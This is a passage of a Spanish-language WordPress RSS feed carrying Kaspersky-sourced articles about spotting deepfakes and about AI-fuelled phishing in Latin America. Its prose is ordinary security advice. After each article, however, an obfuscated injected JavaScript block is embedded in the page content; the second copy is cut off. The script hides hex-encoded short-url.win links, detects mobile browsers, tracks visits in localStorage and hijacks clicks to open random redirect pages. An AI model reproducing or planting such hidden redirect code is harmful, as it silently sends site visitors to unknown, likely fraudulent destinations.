<li><strong>Iluminación y sombreado</strong>. Evalúa si la iluminación del rostro corresponde con el entorno. Las incoherencias en la iluminación pueden indicar manipulación.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Conciencia y educación. </strong>Sé consciente de la existencia de los <em>deepfakes</em> y edúcate sobre las tecnologías de manipulación digital. Cuanto más consciente seas, mejor podrás detectar posibles fraudes.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Cuidado con los sitios web falsos.</strong> Si tienes dudas sobre un sitio web o una aplicación, no introduzcas tus datos ni realices pagos. Visita directamente los <strong>sitios oficiales, así como redes sociales </strong>de las instituciones o figuras públicas para verificar la información.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utiliza soluciones como </strong><a href="https://latam.kaspersky.com/premium%7d">Kaspersky Premium</a>, que protegen contra todo tipo de amenazas, conocidas y desconocidas en la navegación en Internet, tanto en computadoras como en dispositivos móviles.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/fraudes-en-ascenso-descubre-como-detectar-deepfakes-y-proteger-tu-identidad/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98416</post-id>	</item>
		<item>
		<title>Aumento exponencial: Cómo la inteligencia artificial impulsa ataques de phishing y deepfakes en América Latina</title>
		<link>https://www.todoenunclick.com/aumento-exponencial-como-la-inteligencia-artificial-impulsa-ataques-de-phishing-y-deepfakes-en-america-latina/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Fri, 24 Nov 2023 17:24:32 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[ciberamenazas]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[inteligencia artificial]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[Phishing]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=95922</guid>

					<description><![CDATA[<p><img width="950" height="633" src="https://www.todoenunclick.com/wp-content/uploads/2023/11/IA.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Aumento exponencial: Cómo la inteligencia artificial impulsa ataques de phishing y deepfakes en América Latina" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/IA.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/IA.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/IA.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/IA.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/IA.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/IA.jpg?resize=640%2C426&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/IA.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>La Inteligencia Artificial (IA) ya no es un tema del futuro, es parte de la vida cotidiana de todos los internautas que conviven con ella al desbloquear sus dispositivos con reconocimiento facial, usar navegadores y mapas en línea, o emplear asistentes de voz y/o chatbots. Sin embargo, expertos de Kaspersky alertan que la eficiencia de esta herramienta también puede trasladarse a actividades con fines maliciosos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>De acuerdo con <strong>Isabel Manjarrez, Investigadora&nbsp; de seguridad del Equipo Global de Investigación y Análisis de Kaspersky</strong>, entre los fines relacionados con el uso de la IA se encuentran la recolección de datos personales, incluyendo los de reconocimiento (voz, rostro, huellas dactilares), generación de código malicioso, evasión de medidas de seguridad o ataques DDoS, como el <a href="https://expansion.mx/tecnologia/2023/11/09/something-went-wrong-chatgpt-falla-ddos">recién ocurrido con ChatGPT</a>. Sin embargo, existen otros riesgos que destacan por su crecimiento acelerado y su alta tasa de éxito, debido al desconocimiento de los usuarios y el exceso de información presente en línea.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Por ejemplo, están los ataques de phishing personalizados, con un 42.8% de mensajes fraudulentos dirigidos principalmente a robar datos financieros, de acuerdo con el <a href="https://latam.kaspersky.com/blog/panorama-amenazas-latam-2023/26586/">Panorama de Amenazas para América Latina</a> de Kaspersky. Éste registró 286 millones de intentos de ataques de phishing en el último año, lo que representa un alarmante aumento del 617% a nivel global, en comparación con el año anterior. Si bien no se trata de un riesgo reciente, llama la atención que su incremento se debe, entre otros factores, a la aparición de herramientas que utilizan la Inteligencia Artificial para facilitar la creación de estafas de forma automatizada.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Otra de las amenazas que ha crecido a la par de la IA son los <em>deepfakes</em>. Los <a href="https://latam.kaspersky.com/blog/deepfake-darknet-market/26322/">expertos de Kaspersky han alertado</a> sobre estos contenidos donde imágenes y videos son alterados para mostrar información diferente a la original, por ejemplo, para que una persona suplante a otra. Asimismo, se ha dado a conocer la venta de este material falso en la&nbsp;<em>Darknet</em> con el fin de facilitar fraudes financieros, estafas empresariales, chantaje político, venganza, acoso y pornografía.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Ahora, los investigadores también han identificado <em>deepfakes</em> de todo tipo; con audios o voz modificados, y otros de texto, creados usando una redacción similar a la de alguna persona conocida por la víctima. A pesar de que la propagación de esta amenaza y sus consecuencias pueden afectar la reputación, privacidad, así como las finanzas de instituciones y usuarios, cifras de la compañía revelan que <a href="https://latam.kaspersky.com/blog/lena-para-la-infodemia-7-de-cada-10-latinoamericanos-desconoce-que-es-un-deepfake-contribuyendo-a-la-sobrecarga-mental/23773/">la mayoría de los latinoamericanos no sabe qué es un </a><a href="https://latam.kaspersky.com/blog/lena-para-la-infodemia-7-de-cada-10-latinoamericanos-desconoce-que-es-un-deepfake-contribuyendo-a-la-sobrecarga-mental/23773/"><em>deepfake</em></a><a href="https://latam.kaspersky.com/blog/lena-para-la-infodemia-7-de-cada-10-latinoamericanos-desconoce-que-es-un-deepfake-contribuyendo-a-la-sobrecarga-mental/23773/"> (70%) y tampoco sabría reconocer un contenido de este tipo (67%</a><a href="https://latam.kaspersky.com/blog/lena-para-la-infodemia-7-de-cada-10-latinoamericanos-desconoce-que-es-un-deepfake-contribuyendo-a-la-sobrecarga-mental/23773/">)</a>. Esto hace que las personas sean más susceptibles a los fraudes y estafas impulsados por esta técnica.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Para bien, la Inteligencia Artificial se ha convertido en una herramienta valiosa que complementa las funciones humanas de manera eficaz. Su aplicación, por ejemplo, facilita actividades sencillas de nuestro día a día, como desbloquear nuestros dispositivos móviles, hasta acciones más complejas, como impulsar la alfabetización digital. Para mal, también ha facilitado la expansión de nuevas y ya existentes ciberamenazas, a medida que su uso se va generalizando y haciendo más accesible”, </em>comentó <strong>Isabel Manjarrez</strong>. “<em>La Inteligencia Artificial ya está aquí y seguirá desarrollándose. Como cualquier otra tecnología puede traer grandes posibilidades siempre y cuando la usemos de manera segura y responsable”,</em> añadió.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para evitar ser víctimas de las amenazas generadas por IA, Kaspersky recomienda:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><!-- wp:list-item -->
<li><strong>Mantenerse informado sobre las nuevas tecnologías y sus riesgos: </strong>Conocer la IA, cómo funciona y tener en cuenta que ya existen amenazas asociadas a esta herramienta.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utilizar siempre fuentes de información confiables: </strong>Recuerda que el analfabetismo informativo sigue siendo un factor crucial para la proliferación de ciberamenazas como el phishing y los <em>deepfakes</em>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Tener buenos hábitos digitales como "confiar, pero verificar":</strong> Actúa con cautela y escepticismo ante correos electrónicos, mensajes de texto o voz, llamadas, videos u otro contenido multimedia que veas o recibas, especialmente si comunican información extraña o ilógica.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utilizar soluciones de seguridad: </strong>Si bien la protección contra ciberataques o estafas generadas por la IA recién ha comenzado a surgir, ya existen herramientas, como&nbsp;<a href="https://latam.kaspersky.com/premium">Kaspersky Premium</a>, que protegen contra todo tipo de amenazas, conocidas y desconocidas.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Para más información, visita el <a href="https://latam.kaspersky.com/blog/">blog</a> de Kaspersky.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 